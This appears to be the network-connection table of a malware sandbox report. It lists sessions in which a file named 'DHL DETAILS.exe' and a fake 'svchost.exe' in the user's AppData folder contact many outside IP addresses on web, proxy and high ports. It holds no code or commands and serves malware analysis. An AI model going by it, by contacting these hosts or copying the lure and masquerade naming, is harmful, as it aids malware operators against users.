                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5377192.168.2.55141775.119.145.154250846352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5378192.168.2.552122211.234.125.54436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5379192.168.2.56179250.62.134.1393691656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5380192.168.2.552130211.234.125.54436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5381192.168.2.551318218.65.6.15031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5382192.168.2.55140354.233.119.17231286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5383192.168.2.552131211.234.125.54436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5384192.168.2.552135211.234.125.54436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5385192.168.2.55142360.188.102.225180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5386192.168.2.55144351.158.108.165163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5387192.168.2.551700104.17.66.69806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5388192.168.2.55139888.210.20.144200006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5389192.168.2.551669192.252.216.8141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5390192.168.2.54924367.201.59.70414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5391192.168.2.551735104.21.85.200806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5392192.168.2.551287124.163.236.5473026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5393192.168.2.563751162.241.50.1794017956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5394192.168.2.55157618.228.198.164806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5395192.168.2.551741104.18.237.128806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5396192.168.2.550252113.140.74.2680006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5397192.168.2.551598103.166.141.74200746352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5398192.168.2.550111148.72.206.84148156352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5399192.168.2.551617103.23.100.141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5400192.168.2.551647147.75.34.86100106352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5401192.168.2.551644116.203.28.43806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5402192.168.2.5516703.9.71.16731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5403192.168.2.551862162.159.242.109806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5404192.168.2.55172734.83.143.631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5405192.168.2.551928104.21.66.184806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5406192.168.2.551940104.23.107.172806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5407192.168.2.56374592.204.134.385542556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5408192.168.2.55166143.131.242.162156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5409192.168.2.552026104.20.125.124806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5410192.168.2.55188745.14.174.180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5411192.168.2.551989192.154.246.9690006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5412192.168.2.552053172.67.14.237806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5413192.168.2.552013162.159.250.145806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5414192.168.2.549820140.238.245.11681006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5415192.168.2.55163082.137.244.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5416192.168.2.55028882.113.157.122312806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5417192.168.2.55167720.24.43.214806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5418192.168.2.552063157.185.157.151265896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5419192.168.2.55169147.243.205.131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5420192.168.2.561811101.133.162.23889956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5421192.168.2.552151104.20.179.187806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5422192.168.2.561989213.21.56.20415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5423192.168.2.563769212.79.107.116567856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5424192.168.2.551834177.93.50.1649996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5425192.168.2.56186943.255.113.232808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5426192.168.2.551451123.241.210.123806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5427192.168.2.552183172.67.187.242806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5428192.168.2.55163293.171.220.22988886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5429192.168.2.561781171.250.222.13108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5430192.168.2.552116185.162.229.70806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5431192.168.2.551631216.9.224.113806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5432192.168.2.55216472.167.220.46288106352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5433192.168.2.561935103.25.210.1023324056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5434192.168.2.552479218.145.131.1824436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5435192.168.2.552514218.145.131.1824436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5436192.168.2.552521218.145.131.1824436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5437192.168.2.552538218.145.131.1824436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5438192.168.2.55191794.23.220.136195476352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5439192.168.2.55200123.137.248.197806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5440192.168.2.5517598.219.179.237156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5441192.168.2.551900185.110.190.99806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5442192.168.2.55217345.61.188.134444996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5443192.168.2.552266104.18.20.160806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5444192.168.2.551890193.136.97.17806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5445192.168.2.551975178.128.82.105532996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5446192.168.2.55190349.228.131.16950006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5447192.168.2.5521085.252.23.24931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5448192.168.2.55211581.169.187.194806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5449192.168.2.552240162.243.102.20797646352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5450192.168.2.55205843.133.136.20888006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5451192.168.2.551947103.127.1.130806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5452192.168.2.55212047.93.52.3631296352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5453192.168.2.55213789.38.99.29205516352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5454192.168.2.552340172.67.181.58806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5455192.168.2.552350104.18.161.122806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5456192.168.2.55225292.204.134.38286956352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5457192.168.2.552359104.24.236.203806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5458192.168.2.562032186.103.130.91808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5459192.168.2.552386104.20.89.77806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5460192.168.2.550411167.71.5.8380806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5461192.168.2.55229492.204.134.38544676352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5462192.168.2.55303243.134.230.1224436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5463192.168.2.549464117.160.250.163808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5464192.168.2.55303443.134.230.1224436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5465192.168.2.552459104.21.218.103806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5466192.168.2.55304343.134.230.1224436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5467192.168.2.55305543.134.230.1224436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5468192.168.2.550587178.128.82.105399936352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5469192.168.2.552634172.67.181.144806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5470192.168.2.54927079.143.187.58173056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5471192.168.2.552199202.150.1.87806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5472192.168.2.56378891.134.140.1605151356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5473192.168.2.55229193.190.142.57312436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5474192.168.2.552582142.4.123.41806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5475192.168.2.551639120.197.40.21990026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5476192.168.2.552773162.159.241.12806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5477192.168.2.552795192.154.246.9690006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5478192.168.2.552293178.54.21.20380816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5479192.168.2.552809184.72.36.89806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5480192.168.2.552273111.90.150.10910806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5481192.168.2.552857104.24.35.152806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5482192.168.2.552865104.25.87.42806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5483192.168.2.55260538.162.3.5031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5484192.168.2.552870104.16.195.74806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5485192.168.2.552918185.162.228.170806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5486192.168.2.562092187.49.191.1499956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5487192.168.2.551589180.250.159.4941536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5488192.168.2.552464114.129.2.8280816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5489192.168.2.552994188.114.99.171806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5490192.168.2.552764162.120.71.11806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5491192.168.2.552416121.159.146.251806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5492192.168.2.550484202.144.134.15056786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5493192.168.2.549888174.64.199.8241456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5494192.168.2.550728119.196.168.183806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5495192.168.2.55285494.131.60.206583786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5496192.168.2.55094237.187.91.192117216352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5497192.168.2.55236220.24.43.21481236352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5498192.168.2.552410194.247.173.1780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5499192.168.2.562050103.121.62.2567856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5500192.168.2.55264145.43.81.4456916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5501192.168.2.553040162.214.163.13774846352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5502192.168.2.553033172.67.219.60806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5503192.168.2.56394492.204.135.376346256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5504192.168.2.553029137.184.122.22380006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5505192.168.2.553041107.180.88.41375976352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5506192.168.2.55063045.120.178.19710806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5507192.168.2.552436222.223.103.23273026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5508192.168.2.552573119.23.148.173806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5509192.168.2.55285154.178.159.199180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5510192.168.2.55277051.145.176.25080806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5511192.168.2.563823149.202.91.2198056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5512192.168.2.55275560.246.122.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5513192.168.2.55250652.67.10.183806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5514192.168.2.55268994.154.152.1280796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5515192.168.2.55309294.131.59.241583786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
